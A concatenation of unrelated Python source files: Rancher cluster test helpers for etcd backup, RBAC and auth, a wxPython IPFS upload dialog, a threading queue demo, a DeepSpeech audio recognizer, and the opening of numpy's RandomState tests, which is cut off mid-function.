backup_info["workload"] = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, backup_info["workload"], "daemonSet", ns.name,
len(get_schedulable_nodes(cluster)))
host = "test" + str(random_int(10000, 99999)) + ".com"
namespace["host"] = host
path = "/name.html"
rule = {"host": host,
"paths": [{"workloadIds": [backup_info["workload"].id],
"targetPort": "80"}]}
p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Perform Backup
backup = cluster.backupEtcd()
backup_info["backupname"] = backup['metadata']['name']
wait_for_backup_to_active(cluster, backup_info["backupname"])
# Get all the backup info
etcdbackups = cluster.etcdBackups(name=backup_info["backupname"])
backup_info["etcdbackupdata"] = etcdbackups['data']
backup_info["backup_id"] = backup_info["etcdbackupdata"][0]['id']
if backup_mode == "s3":
backupfileurl = backup_info["etcdbackupdata"][0]['filename']
# Check the backup filename exists in S3
parseurl = urlparse(backupfileurl)
backup_info["backupfilename"] = os.path.basename(parseurl.path)
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert backup_found, "the backup was not found in the S3 bucket"
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
assert backup_info["etcdbackupdata"][0]['filename'] in response, \
"The filename doesn't match any of the files locally"
return namespace, backup_info
def validate_backup_restore(namespace, backup_info):
p_client = namespace["p_client"]
ns = namespace["ns"]
client = get_user_client()
cluster = namespace["cluster"]
name = random_test_name("default")
host = namespace["host"]
path = "/name.html"
con = [{"name": "test1",
"image": TEST_IMAGE}]
# Create workload after backup
testworkload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, testworkload, "deployment", ns.name)
# Perform Restore
cluster.restoreFromEtcdBackup(etcdBackupId=backup_info["backup_id"])
# After restore, validate cluster
validate_cluster(client, cluster, intermediate_state="updating",
check_intermediate_state=True,
skipIngresscheck=False)
# Verify the ingress created before taking the snapshot
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Verify the workload created after getting a snapshot does not exist
# after restore
workload_list = p_client.list_workload(uuid=testworkload.uuid).data
print(len(workload_list))
assert len(workload_list) == 0, "workload shouldn't exist after restore"
return namespace, backup_info
def validate_backup_delete(namespace, backup_info, backup_mode=None):
client = get_user_client()
cluster = namespace["cluster"]
client.delete(
cluster.etcdBackups(name=backup_info["backupname"])['data'][0]
)
wait_for_backup_to_delete(cluster, backup_info["backupname"])
assert len(cluster.etcdBackups(name=backup_info["backupname"])) == 0, \
"backup shouldn't be listed in the Cluster backups"
if backup_mode == "s3":
# Check the backup reference is deleted in Rancher and S3
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert_message = "The backup should't exist in the S3 bucket"
assert backup_found is False, assert_message
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
filename = backup_info["etcdbackupdata"][0]['filename']
assert filename not in response, \
"The file still exist in the filesystem"
def apply_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('apply -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def get_crd(ns, crd_name, kubectl_context):
return execute_kubectl_cmd('get ' + crd_name + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def delete_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('delete -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def prepare_auth_data():
name = \
os.path.join(os.path.dirname(os.path.realpath(__file__)) + "/resource",
AUTH_PROVIDER.lower() + ".json")
with open(name) as reader:
auth_data = reader.read()
raw = json.loads(auth_data).get("nested_group_info")
nested_group["auth_info"] = raw.copy()
nested_group["users"] = raw.get("users")
raw.pop("users")
nested_group["group_dic"] = raw
nested_group["groups"] = raw.keys()
def is_nested():
""" check if the provided groups are nested groups,
return True if at least one of the groups contains other groups
"""
count = 0
for user, group in nested_group["group_dic"].items():
if len(group) == 0:
count += 1
if count < len(nested_group["group_dic"]):
return True
return False
def get_group(nested=False):
""" return a group or a nested group"""
if nested:
# return the name of a group that contains at least one other group
for item in nested_group["groups"]:
if len(nested_group["group_dic"].get(item).get("users")) == 0:
pass
sub_groups = nested_group["group_dic"].get(item).get("groups")
if len(sub_groups) == 0:
pass
for g in sub_groups:
if len(nested_group["group_dic"].get(g).get("users")) > 0:
return item
assert False, "cannot find any valid nested group"
else:
# return the name of a group that has at least one direct user
for group in nested_group["groups"]:
if len(nested_group["group_dic"].get(group).get("users")) > 0:
return group
assert False, "cannot find any valid non-nested group"
def get_user_by_group(group, nested=False):
""" return the list of uses in the group or nested group
if nested is False, return the direct users in the group;
otherwise, return all users including those from nested groups
"""
def get_user_in_nested_group(group, source):
if group == "":
return []
users = source["group_dic"].get(group).get("users")
for sub_group in source["group_dic"].get(group).get("groups"):
temp = get_user_in_nested_group(sub_group, source)
for user in temp:
if user not in users:
users.append(user)
return users
if nested:
users = get_user_in_nested_group(group, nested_group)
assert len(users) > 0, "no user in the group"
else:
users = nested_group["group_dic"].get(group).get("users")
assert users is not None, "no user in the group"
print("group: {}, users: {}".format(group, users))
return users
def get_a_group_and_a_user_not_in_it(nested=False):
""" return a group or a nested group and a user that is not in the group"""
all_users = nested_group["users"]
for group in nested_group["groups"]:
group_users = get_user_by_group(group, nested)
for user in all_users:
if user not in group_users:
print("group: {}, user not in it: {}".format(group, user))
return group, user
assert False, "cannot find a group and a user not in it"
def get_group_principal_id(group_name, token=ADMIN_TOKEN, expected_status=200):
""" get the group's principal id from the auth provider"""
headers = {'Authorization': 'Bearer ' + token}
r = requests.post(CATTLE_AUTH_PRINCIPAL_URL,
json={'name': group_name,
'principalType': 'group',
'responseType': 'json'},
verify=False, headers=headers)
assert r.status_code == expected_status
return r.json()['data'][0]["id"]
def login_as_auth_user(username, password, login_url=LOGIN_AS_AUTH_USER_URL):
""" login with the user account from the auth provider,
and return the user token"""
r = requests.post(login_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
assert r.status_code in [200, 201]
return r.json()
def validate_service_discovery(workload, scale,
p_client=None, ns=None, testclient_pods=None):
expected_ips = []
pods = p_client.list_pod(workloadId=workload["id"]).data
assert len(pods) == scale
for pod in pods:
expected_ips.append(pod["status"]["podIp"])
host = '{0}.{1}.svc.cluster.local'.format(workload.name, ns.id)
for pod in testclient_pods:
validate_dns_entry(pod, host, expected_ips)
def auth_get_project():
return auth_rbac_data["project"]
def auth_get_namespace():
return auth_rbac_data["namespace"]
def auth_get_user_token(username):
if username in auth_rbac_data["users"].keys():
return auth_rbac_data["users"][username].token
return None
def add_role_to_user(user, role):
"""this function adds a user from the auth provider to given cluster"""
admin_client, cluster = get_global_admin_client_and_cluster()
project = auth_get_project()
ns = auth_get_namespace()
if not (project and ns):
project, ns = create_project_and_ns(ADMIN_TOKEN, cluster,
random_test_name("p-test-auth"))
auth_rbac_data["project"] = project
auth_rbac_data["namespace"] = ns
if role in [PROJECT_OWNER, PROJECT_MEMBER, PROJECT_READ_ONLY]:
assign_members_to_project(admin_client, user, project, role)
else:
assign_members_to_cluster(admin_client, user, cluster, role)
auth_rbac_data["users"][user.username] = user
def auth_resource_cleanup():
""" remove the project and namespace created for the AUTH tests"""
client, cluster = get_global_admin_client_and_cluster()
client.delete(auth_rbac_data["project"])
auth_rbac_data["project"] = None
auth_rbac_data["ns"] = None
for username, user in auth_rbac_data["users"].items():
user_crtbs = client.list_cluster_role_template_binding(userId=user.id)
for crtb in user_crtbs:
client.delete(crtb)
class WebsocketLogParse:
"""
the class is used for receiving and parsing the message
received from the websocket
"""
def __init__(self):
self.lock = Lock()
self._last_message = ''
def receiver(self, socket, skip):
"""
run a thread to receive and save the message from the web socket
:param socket: the socket connection
:param skip: if True skip the first char of the received message
"""
while True and socket.connected:
try:
data = socket.recv()
# the message from the kubectl contains an extra char
if skip:
data = data[1:]
if len(data) < 5:
pass
data = base64.b64decode(data).decode()
self.lock.acquire()
self._last_message += data
self.lock.release()
except websocket.WebSocketConnectionClosedException:
print("Connection closed")
break
except websocket.WebSocketProtocolException as wpe:
print("Error: {}".format(wpe))
break
@staticmethod
def start_thread(target, args):
thread = Thread(target=target, args=args)
thread.daemon = True
thread.start()
time.sleep(1)
@property
def last_message(self):
return self._last_message
@last_message.setter
def last_message(self, value):
self.lock.acquire()
self._last_message = value
self.lock.release()
def wait_for_cluster_delete(client, cluster_name, timeout=DEFAULT_TIMEOUT):
start = time.time()
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
while cluster_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for cluster to get deleted")
time.sleep(.5)
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
def create_connection(url, subprotocols):
"""
create a webscoket connection and check if it is connected
:param url: the url to connect to
:param subprotocols: the list of subprotocols
:return:
"""
ws = websocket.create_connection(
url=url,
sslopt={"cert_reqs": ssl.CERT_NONE},
subprotocols=subprotocols,
timeout=10,
cookie="R_SESS=" + USER_TOKEN
)
assert ws.connected, "failed to build the websocket"
return ws
def wait_for_hpa_to_active(client, hpa, timeout=DEFAULT_TIMEOUT):
start = time.time()
hpalist = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpalist) == 1
hpa = hpalist[0]
while hpa.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
hpas = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpas) == 1
hpa = hpas[0]
return hpa
def create_pv_pvc(client, ns, nfs_ip, cluster_client):
pv_object = create_pv(cluster_client, nfs_ip)
pvc_name = random_test_name("pvc")
pvc_config = {"accessModes": ["ReadWriteOnce"],
"name": pvc_name,
"volumeId": pv_object.id,
"namespaceId": ns.id,
"storageClassId": "",
"resources": {"requests": {"storage": "10Gi"}}
}
pvc_object = client.create_persistent_volume_claim(pvc_config)
pvc_object = wait_for_pvc_to_be_bound(client, pvc_object, timeout=300)
return pv_object, pvc_object
def create_pv(client, nfs_ip):
pv_name = random_test_name("pv")
pv_config = {"type": "persistentVolume",
"accessModes": ["ReadWriteOnce"],
"name": pv_name,
"nfs": {"readOnly": "false",
"type": "nfsvolumesource",
"path": NFS_SERVER_MOUNT_PATH,
"server": nfs_ip
},
"capacity": {"storage": "50Gi"}
}
pv_object = client.create_persistent_volume(pv_config)
capacitydict = pv_object['capacity']
assert capacitydict['storage'] == '50Gi'
assert pv_object['type'] == 'persistentVolume'
return pv_object
def delete_resource_in_AWS_by_prefix(resource_prefix):
"""
:param resource_prefix: the prefix of resource name
:return: None
"""
# delete nodes of both local and custom clusters
node_filter = [{
'Name': 'tag:Name',
'Values': [resource_prefix + "-*"]
}]
nodes = AmazonWebServices().get_nodes(filters=node_filter)
if nodes is None:
print("deleting the following instances: None")
else:
print("deleting the following instances: {}"
.format([node.public_ip_address for node in nodes]))
AmazonWebServices().delete_nodes(nodes)
# delete load balancer and target groups
tg_list = []
lb_list = []
lb_names = [resource_prefix + '-nlb',
resource_prefix + '-multinode-nlb',
resource_prefix + '-k3s-nlb',
resource_prefix + '-internal-nlb']
for name in lb_names:
lb_arn = AmazonWebServices().get_lb(name)
if lb_arn is not None:
lb_list.append(lb_arn)
res = AmazonWebServices().get_target_groups(lb_arn)
tg_list.extend(res)
print("deleting the following load balancers: {}".format(lb_list))
print("deleting the following target groups: {}".format(tg_list))
for lb in lb_list:
AmazonWebServices().delete_lb(lb)
for tg in tg_list:
AmazonWebServices().delete_target_group(tg)
# delete rds
db_name = resource_prefix + "-multinode-db"
print("deleting the database (if it exists): {}".format(db_name))
AmazonWebServices().delete_db(db_name)
# delete the route 53 record
route53_names = [resource_prefix + ".qa.rancher.space.",
resource_prefix + "-internal.qa.rancher.space."]
for name in route53_names:
print("deleting the route53 record (if it exists): {}".format(name))
AmazonWebServices().delete_route_53_record(name)
print("deletion is done")
return None
def configure_cis_requirements(aws_nodes, profile, node_roles, client,
cluster):
i = 0
if profile == 'rke-cis-1.4':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo useradd etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
elif profile == 'rke-cis-1.5':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w vm.panic_on_oom=0")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
aws_node.execute_command("sudo sysctl -w "
"kernel.keys.root_maxbytes=25000000")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo groupadd -g 52034 etcd")
aws_node.execute_command("sudo useradd -u 52034 -g 52034 etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
time.sleep(5)
cluster = validate_cluster_state(client, cluster)
# the workloads under System project to get active
time.sleep(20)
if profile == 'rke-cis-1.5':
create_kubeconfig(cluster)
network_policy_file = DATA_SUBDIR + "/default-allow-all.yaml"
account_update_file = DATA_SUBDIR + "/account_update.yaml"
items = execute_kubectl_cmd("get namespaces -A")["items"]
all_ns = [item["metadata"]["name"] for item in items]
for ns in all_ns:
execute_kubectl_cmd("apply -f {0} -n {1}".
format(network_policy_file, ns))
namespace = ["default", "kube-system"]
for ns in namespace:
execute_kubectl_cmd('patch serviceaccount default'
' -n {0} -p "$(cat {1})"'.
format(ns, account_update_file))
return cluster
def get_node_details(cluster, client):
"""
lists the nodes from the cluster. This cluster has only 1 node.
:return: client and node object
"""
create_kubeconfig(cluster)
nodes = client.list_node(clusterId=cluster.id).data
assert len(nodes) > 0
for node in nodes:
if node.worker:
break
return client, node
def create_service_account_configfile():
client, cluster = get_user_client_and_cluster()
create_kubeconfig(cluster)
name = random_name()
# create a service account
execute_kubectl_cmd(cmd="create sa {}".format(name), json_out=False)
# get the ca and token
res = execute_kubectl_cmd(cmd="get secret -o name", json_out=False)
secret_name = ""
for item in res.split("\n"):
if name in item:
secret_name = item.split("/")[1]
break
res = execute_kubectl_cmd(cmd="get secret {}".format(secret_name))
ca = res["data"]["ca.crt"]
token = res["data"]["token"]
token = base64.b64decode(token).decode()
server = None
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.controlPlane:
server = "https://" + node.externalIpAddress + ":6443"
break
assert server is not None, 'failed to get the public ip of control plane'
config = """
apiVersion: v1
kind: Config
clusters:
- name: test-cluster
cluster:
server: {server}
certificate-authority-data: {ca}
contexts:
- name: default-context
context:
cluster: test-cluster
namespace: default
user: test-user
current-context: default-context
users:
- name: test-user
user:
token: {token}
"""
config = config.format(server=server, ca=ca, token=token)
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
with open(config_file, "w") as file:
file.write(config)
return name
def rbac_test_file_reader(file_path=None):
"""
This method generates test cases from an input file and return the result
that can be used to parametrize pytest cases
:param file_path: the path to the JSON file for test cases
:return: a list of tuples of
(cluster_role, command, authorization, service account name)
"""
if test_rbac_v2 == "False":
return []
if file_path is None:
pytest.fail("no file is provided")
with open(file_path) as reader:
test_cases = json.loads(reader.read().replace("{resource_root}",
DATA_SUBDIR))
output = []
for cluster_role, checks in test_cases.items():
# create a service account for each role
name = create_service_account_configfile()
# create the cluster role binding
cmd = "create clusterrolebinding {} " \
"--clusterrole {} " \
"--serviceaccount {}".format(name, cluster_role,
"default:" + name)
execute_kubectl_cmd(cmd, json_out=False)
for command in checks["should_pass"]:
output.append((cluster_role, command, True, name))
for command in checks["should_fail"]:
output.append((cluster_role, command, False, name))
return output
def validate_cluster_role_rbac(cluster_role, command, authorization, name):
"""
This methods creates a new service account to validate the permissions
both before and after creating the cluster role binding between the
service account and the cluster role
:param cluster_role: the cluster role
:param command: the kubectl command to run
:param authorization: if the service account has the permission: True/False
:param name: the name of the service account, cluster role binding, and the
kubeconfig file
"""
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
result = execute_kubectl_cmd(command,
json_out=False,
kubeconfig=config_file,
stderr=True).decode('utf_8')
if authorization:
assert "Error from server (Forbidden)" not in result, \
"{} should have the authorization to run {}".format(cluster_role,
command)
else:
assert "Error from server (Forbidden)" in result, \
"{} should NOT have the authorization to run {}".format(
cluster_role, command)
|
wxRavenIPFSUploaderLogic.py
|
'''
Created on 5 janv. 2022
@author: slinux
'''
from .wxRavenIPFSDesign import wxRavenIPFSFileUploaderDialog
import threading
import time
import wx
from wxRavenGUI.application.wxcustom.CustomLoading import *
class wxRavenIPFSFileUploader(wxRavenIPFSFileUploaderDialog):
'''
classdocs
'''
view_base_name = "IPFS File Uploader"
view_name = "IPFS File Uploader"
parent_frame = None
default_position = "dialog"
icon = 'ipfs_add'#wx.Bitmap( u"res/default_style/normal/help_view.png", wx.BITMAP_TYPE_ANY )
def __init__(self,parent, parentFrame, position = "dialog", viewName= "IPFS File Uploader", isInternalPluginView=False):
'''
Constructor
'''
super().__init__(parent=parent)
#
# Your constructor here
#
self.view_base_name = "IPFS File Uploader"
self.view_name = viewName
self.parent_frame = parentFrame
self.default_position = position
self._fileSent = False
self._waitingAnswer = False
self._filename = ""
self._loadingPanel = None
#This is to add the view in the appropriate place using the mainapp to do so
#
#The only exception is when the pannel itself is called by the plugin or another view
#In this case the position in main app must not be managed (see rpc command panel as example)
#
#if not isInternalPluginView:
# parentFrame.Add(self, self.view_name ,position, parentFrame.RessourcesProvider.GetImage(self.icon))
#
# Dialog modification
#
#
# If your app need to load a bunch of data, it may want to wait the app is ready
# specially at startup + resume of plugins
# Use this thread method + callback to manage the 1sec/2sec init delay
#
#
self.waitApplicationReady()
def waitApplicationReady(self):
t=threading.Thread(target=self.__waitLoop_T__, args=(self.UpdateView,))
t.start()
def __waitLoop_T__(self,callback):
while not self.parent_frame._isReady:
time.sleep(1)
wx.CallAfter(callback, ())
#Override the UpdateView method to define what happen when plugin call UpdateViews()
def UpdateView(self, evt=None):
self.UpdateDataFromPluginDatas()
self.Layout()
def OnSendButton(self, evt):
fts = self.m_filePicker1.GetPath()
self._filename = fts
print(f"file to send : {fts}")
_p = self.parent_frame.GetPlugin("IPFS")
_p.__setHashResult__(fts, -1)
_p.UploadFileToIPFS_RPC(fts)
self._fileSent = True
self._waitingAnswer = True
self.m_SendButton.Enable(False)
self.ShowLoading()
t=threading.Thread(target=self.__waitHashResultLoop_T__)
t.start()
def __waitHashResultLoop_T__(self, evt=None):
_p = self.parent_frame.GetPlugin("IPFS")
fts = self.m_filePicker1.GetPath()
_hashResult = -1
while _hashResult == -1:
time.sleep(1)
_hashResult = _p.__getHashResult__(fts)
wx.CallAfter(self.UpdateDataFromPluginDatas, ())
def ShowLoading(self):
if self._loadingPanel == None:
self._loadingPanel = wxBackgroundWorkerAnimation(self)
self._loadingPanel.Show(show=True)
self.Layout()
def HideLoading(self):
if self._loadingPanel != None:
self._loadingPanel.Hide()
self.Layout()
#Example to show how plugin data are retreived
def UpdateDataFromPluginDatas(self, evt=None):
self.HideLoading()
if self._filename == "":
self.m_SendButton.Enable(True)
return
print(f"UpdateDataFromPluginDatas IPFS {self._filename}")
try:
print("Hash received !")
if self._filename != "":
myPluginData = self.parent_frame.GetPluginData("IPFS","_uploadedFiles")
if myPluginData.__contains__(self._filename):
self.m_hashResult.SetValue(myPluginData[self._filename])
self.m_bitmap2.SetBitmap(self.parent_frame.RessourcesProvider.GetImage('passed'))
else:
self.m_bitmap2.SetBitmap(self.parent_frame.RessourcesProvider.GetImage('error_tsk'))
#
#myPluginSetting = self.parent_frame.GetPluginSetting("Tutorial","booleansetting")#SavePanelSettings GetPluginSetting
#
#Update your panel
#
pass
#textToPrint = " booleansetting = " + str(myPluginSetting)
#textToPrint = textToPrint + "\n\n myPluginData2 = " + str(myPluginData)
#self.m_staticText2.SetLabel(str(textToPrint))
except Exception as e:
self.parent_frame.Log("Unable to load ipfs upload datas" , type="warning")
self.m_bitmap2.SetBitmap(self.parent_frame.RessourcesProvider.GetImage('error_tsk'))
self.m_SendButton.Enable(True)
|
comb_queue_thread.py
|
import queue
import threading
import time
def func(q, thread_no):
while True:
task = q.get()
time.sleep(2)
q.task_done()
print(f'Thread #{thread_no} is doing task #{task} in the queue.')
q = queue.Queue()
for i in range(4):
worker = threading.Thread(target=func, args=(q, i,), daemon=True)
worker.start()
for j in range(10):
q.put(j)
q.join()
|
__init__.py
|
# -*- coding: UTF-8 -*-
from __future__ import absolute_import
# Operates on sound fragments consisting of signed integer samples 8, 16
# or 32 bits wide, stored in Python strings.
import audioop
from contextlib import contextmanager
from ctypes import CFUNCTYPE, c_char_p, c_int, cdll
from threading import Thread
import pyaudio # Provides Python bindings for PortAudio, the cross platform audio API
from embedded_ava import EmbeddedVA
from embedded_ava.sr.deepspeech.config import ConfigDeepSpeech
from embedded_ava.sr.deepspeech.server import SpeechServerMain
import numpy as np
CHUNK = 8000 # Smallest unit of audio. 1024 bytes
FORMAT = pyaudio.paInt16 # Data format
CHANNELS = 1 # Number of channels
RATE = 16000 # Bit Rate of audio stream / Frame Rate
THRESHOLD = 1000 # Threshhold value for detecting stimulant
SILENCE_DETECTION = 1 # Wait number of frames to decide whether it fell silent or not
LISTENING = False
class DeepSpeechRecognizer():
def __init__(self):
# logging.basicConfig(level=logging.INFO)
self.__class__.finished = False
@classmethod
def set_finished(self, finished):
self.finished = True
def reset(self):
self.__class__.finished = False
def recognize(self, her):
with noalsaerr():
p = pyaudio.PyAudio() # Create a PyAudio session
# Create a stream
stream = p.open(
format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
output=True,
frames_per_buffer=CHUNK)
try:
data = stream.read(
CHUNK) # Get first data frame from the microphone
# Loop over the frames of the audio / data chunks
audio = None
# print("START LISTENNING")
while data != '':
rms = audioop.rms(
data, 2) # Calculate Root Mean Square of current chunk
if rms >= THRESHOLD: # If Root Mean Square value is greater than THRESHOLD constant
audio = data
silence_counter = 0 # Define silence counter
# While silence counter value less than SILENCE_DETECTION constant
while silence_counter < SILENCE_DETECTION:
data = stream.read(
CHUNK) # Read a new chunk from the stream
if LISTENING:
stream.write(data, CHUNK)
audio = audio + data
rms = audioop.rms(
data, 2
) # Calculate Root Mean Square of current chunk again
if rms < THRESHOLD: # If Root Mean Square value is less than THRESHOLD constant
silence_counter += 1 # Then increase silence counter
else: # Else
silence_counter = 0 # Assign zero value to silence counter
# print("Analyzing...")
stream.stop_stream()
audio = np.fromstring(audio, dtype=np.int16) # Fix data type
com = SpeechServerMain.ds.stt(audio, RATE)
stream.start_stream()
# print(com)
t = Thread(target=her.command, args=(com,))
t.start()
self.reset()
data = stream.read(CHUNK) # Read a new chunk from the stream
if LISTENING:
stream.write(data, CHUNK)
except KeyboardInterrupt:
stream.stop_stream()
stream.close()
p.terminate()
# self.loop.quit()
raise KeyboardInterrupt
ERROR_HANDLER_FUNC = CFUNCTYPE(None, c_char_p, c_int, c_char_p, c_int,
c_char_p)
def py_error_handler(filename, line, function, err, fmt):
pass
c_error_handler = ERROR_HANDLER_FUNC(py_error_handler)
@contextmanager
def noalsaerr():
asound = cdll.LoadLibrary('libasound.so')
asound.snd_lib_error_set_handler(c_error_handler)
yield
asound.snd_lib_error_set_handler(None)
if __name__ == '__main__':
recognizer = DeepSpeechRecognizer()
recognizer.recognize([])
|
test_randomstate.py
|
import hashlib
import pickle
import sys
import warnings
import numpy as np
import pytest
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy.random import MT19937, PCG64
from numpy import random
INT_FUNCS = {'binomial': (100.0, 0.6),
'geometric': (.5,),
'hypergeometric': (20, 20, 10),
'logseries': (.5,),
'multinomial': (20, np.ones(6) / 6.0),
'negative_binomial': (100, .5),
'poisson': (10.0,),
'zipf': (2,),
}
if np.iinfo(int).max < 2**32:
# Windows and some 32-bit platforms, e.g., ARM
INT_FUNC_HASHES = {'binomial': '2fbead005fc63942decb5326d36a1f32fe2c9d32c904ee61e46866b88447c263',
'logseries': '23ead5dcde35d4cfd4ef2c105e4c3d43304b45dc1b1444b7823b9ee4fa144ebb',
'geometric': '0d764db64f5c3bad48c8c33551c13b4d07a1e7b470f77629bef6c985cac76fcf',
'hypergeometric': '7b59bf2f1691626c5815cdcd9a49e1dd68697251d4521575219e4d2a1b8b2c67',
'multinomial': 'd754fa5b92943a38ec07630de92362dd2e02c43577fc147417dc5b9db94ccdd3',
'negative_binomial': '8eb216f7cb2a63cf55605422845caaff002fddc64a7dc8b2d45acd477a49e824',
'poisson': '70c891d76104013ebd6f6bcf30d403a9074b886ff62e4e6b8eb605bf1a4673b7',
'zipf': '01f074f97517cd5d21747148ac6ca4074dde7fcb7acbaec0a936606fecacd93f',
}
else:
INT_FUNC_HASHES = {'binomial': '8626dd9d052cb608e93d8868de0a7b347258b199493871a1dc56e2a26cacb112',
'geometric': '8edd53d272e49c4fc8fbbe6c7d08d563d62e482921f3131d0a0e068af30f0db9',
'hypergeometric': '83496cc4281c77b786c9b7ad88b74d42e01603a55c60577ebab81c3ba8d45657',
'logseries': '65878a38747c176bc00e930ebafebb69d4e1e16cd3a704e264ea8f5e24f548db',
'multinomial': '7a984ae6dca26fd25374479e118b22f55db0aedccd5a0f2584ceada33db98605',
'negative_binomial': 'd636d968e6a24ae92ab52fe11c46ac45b0897e98714426764e820a7d77602a61',
'poisson': '956552176f77e7c9cb20d0118fc9cf690be488d790ed4b4c4747b965e61b0bb4',
'zipf': 'f84ba7feffda41e606e20b28dfc0f1ea9964a74574513d4a4cbc98433a8bfa45',
}
@pytest.fixture(scope='module', params=INT_FUNCS)
def int_func(request):
return (request.param, INT_FUNCS[request.param],
INT_FUNC_HASHES[request.param])
def assert_mt19937_state_equal(a, b):
assert_equal(a['bit_generator'], b['bit_generator'])
assert_array_equal(a['state']['key'], b['state']['key'])
assert_array_equal(a['state']['pos'], b['state']['pos'])
assert_equal(a['has_gauss'], b['has_gauss'])
assert_equal(a['gauss'], b['gauss'])
class TestSeed:
def test_scalar(self):
s = random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, random.RandomState, -0.5)
assert_raises(ValueError, random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, random.RandomState, [-0.5])
assert_raises(ValueError, random.RandomState, [-1])
assert_raises(ValueError, random.RandomState, [4294967296])
assert_raises(ValueError, random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, random.RandomState, np.array([],
dtype=np.int64))
assert_raises(ValueError, random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, random.RandomState, [[1, 2, 3],
[4, 5, 6]])
def test_cannot_seed(self):
rs = random.RandomState(PCG64(0))
with assert_raises(TypeError):
rs.seed(1234)
def test_invalid_initialization(self):
assert_raises(ValueError, random.RandomState, MT19937)
class TestBinomial:
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
